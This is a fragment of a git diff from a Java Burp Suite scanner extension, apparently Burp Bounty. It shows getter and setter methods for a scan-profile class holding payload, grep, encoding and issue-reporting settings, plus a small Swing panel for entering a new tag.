+ public String getIssueSeverity() {
+ return IssueSeverity;
+ }
+
+ public String getIssueConfidence() {
+ return IssueConfidence;
+ }
+
+ public String getIssueDetail() {
+ return IssueDetail;
+ }
+
+ public String getIssueBackground() {
+ return IssueBackground;
+ }
+
+ public String getRemediationDetail() {
+ return RemediationDetail;
+ }
+
+ public String getRemediationBackground() {
+ return RemediationBackground;
+ }
+
+ //Set functions
+ public void setName(String name) {
+ Name = name;
+ }
+
+ public void setHeader(List header) {
+ Header = header;
+ }
+
+ public void setVariationAttributes(List variationAttributes) {
+ VariationAttributes = variationAttributes;
+ }
+
+ public void setInsertionPointType(List insertionPointType) {
+ InsertionPointType = insertionPointType;
+ }
+
+
+ public void setAuthor(String author) {
+ Author = author;
+ }
+
+ public void setActive(boolean active) {
+ Active = active;
+ }
+
+ public void setScanner(int scanner) {
+ Scanner = scanner;
+ }
+
+ public void setPayloadPosition(int payloadposition) {
+ payloadPosition = payloadposition;
+ }
+
+ public void setPayloads(List payloads) {
+ Payloads = payloads;
+ }
+
+ public void setEncoder(List encoder) {
+ Encoder = encoder;
+ }
+
+ public void setCharsToUrlEncode(String charstourlencode) {
+ CharsToUrlEncode = charstourlencode;
+ }
+
+ public void setPayloadsFile(String payloadsfile) {
+ payloadsFile = payloadsfile;
+ }
+
+ public void setGrepsFile(String grepsfile) {
+ grepsFile = grepsfile;
+ }
+
+ public void setGreps(List grep) {
+ Grep = grep;
+ }
+
+ public void setTags(List tags) {
+ Tags = tags;
+ }
+
+ public void setPathDiscovery(boolean pathdiscovery) {
+ pathDiscovery = pathdiscovery;
+ }
+
+ public void setCaseSensitive(boolean casesensitive) {
+ CaseSensitive = casesensitive;
+ }
+
+ public void setPayloadResponse(boolean payloadresponse) {
+ PayloadResponse = payloadresponse;
+ }
+
+ public void setNotResponse(boolean notresponse) {
+ NotResponse = notresponse;
+ }
+
+ public void setOnlyHTTP(boolean onlyHTTP) {
+ OnlyHTTP = onlyHTTP;
+ }
+
+ public void setExcludeHTTP(boolean excludeHTTP) {
+ ExcludeHTTP = excludeHTTP;
+ }
+
+ public void setIsContentType(boolean iscontenttype) {
+ IsContentType = iscontenttype;
+ }
+
+ public void setTime(String timeout) {
+ TimeOut = timeout;
+ }
+
+ public void setIsTime(boolean istime) {
+ isTime = istime;
+ }
+
+ public void setContentLength(String contentlength) {
+ contentLength = contentlength;
+ }
+
+ public void setIsContentLength(boolean iscontentlength) {
+ iscontentLength = iscontentlength;
+ }
+
+ public void setContentType(String contenttype) {
+ ContentType = contenttype;
+ }
+
+ public void setNegativeCT(boolean negativect) {
+ NegativeCT = negativect;
+ }
+
+ public void setIsResponseCode(boolean isresponsecode) {
+ IsResponseCode = isresponsecode;
+ }
+
+ public void setResponseCode(String responsecode) {
+ ResponseCode = responsecode;
+ }
+
+ public void setNegativeRC(boolean negativerc) {
+ NegativeRC = negativerc;
+ }
+
+ public void setUrlEncode(boolean urlencode) {
+ UrlEncode = urlencode;
+ }
+
+ public void setMatchType(int matchtype) {
+ MatchType = matchtype;
+ }
+
+ public void setRedirType(int redirtype) {
+ RedirType = redirtype;
+ }
+
+ public void setMaxRedir(int maxredir) {
+ MaxRedir = maxredir;
+ }
+
+ public void setIssueName(String issuename) {
+ IssueName = issuename;
+ }
+
+ public void setIssueSeverity(String issueseverity) {
+ IssueSeverity = issueseverity;
+ }
+
+ public void setIssueConfidence(String issueconfidence) {
+ IssueConfidence = issueconfidence;
+ }
+
+ public void setIssueDetail(String issuedetail) {
+ IssueDetail = issuedetail;
+ }
+
+ public void setIssueBackground(String issuebackground) {
+ IssueBackground = issuebackground;
+ }
+
+ public void setRemediationDetail(String remediationdetail) {
+ RemediationDetail = remediationdetail;
+ }
+
+ public void setRemediationBackground(String remediationbackground) {
+ RemediationBackground = remediationbackground;
+ }
+}
diff --git a/src/NewTag.form b/src/NewTag.form
new file mode 100644
index 0000000..de471c4
--- /dev/null
+++ b/src/NewTag.form
@@ -0,0 +1,59 @@
+
+
+
diff --git a/src/NewTag.java b/src/NewTag.java
new file mode 100644
index 0000000..887fa47
--- /dev/null
+++ b/src/NewTag.java
@@ -0,0 +1,68 @@
+/*
+Copyright 2018 Eduardo Garcia Melia
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+ */
+package burpbounty;
+
+public class NewTag extends javax.swing.JPanel {
+
+ public NewTag() {
+ initComponents();
+
+ }
+
+ /**
+ * This method is called from within the constructor to initialize the form.
+ * WARNING: Do NOT modify this code. The content of this method is always
+ * regenerated by the Form Editor.
+ */
+ @SuppressWarnings("unchecked")
+ // //GEN-BEGIN:initComponents
+ private void initComponents() {
+
+ newTagtext = new javax.swing.JTextField();
+ jLabel47 = new javax.swing.JLabel();
+
+ jLabel47.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel47.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel47.setText("Set new tag");
+
+ javax.swing.GroupLayout layout = new javax.swing.GroupLayout(this);
+ this.setLayout(layout);
+ layout.setHorizontalGroup(
+ layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(layout.createSequentialGroup()
+ .addContainerGap()
+ .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(newTagtext, javax.swing.GroupLayout.PREFERRED_SIZE, 267, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(jLabel47))
+ .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
+ );
+ layout.setVerticalGroup(
+ layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(layout.createSequentialGroup()
+ .addContainerGap()
+ .addComponent(jLabel47)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(newTagtext, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addContainerGap(13, Short.MAX_VALUE))
+ );
+ }// //GEN-END:initComponents
+
+
+ // Variables declaration - do not modify//GEN-BEGIN:variables
+ private javax.swing.JLabel jLabel47;
+ public javax.swing.JTextField newTagtext;
+ // End of variables declaration//GEN-END:variables
+}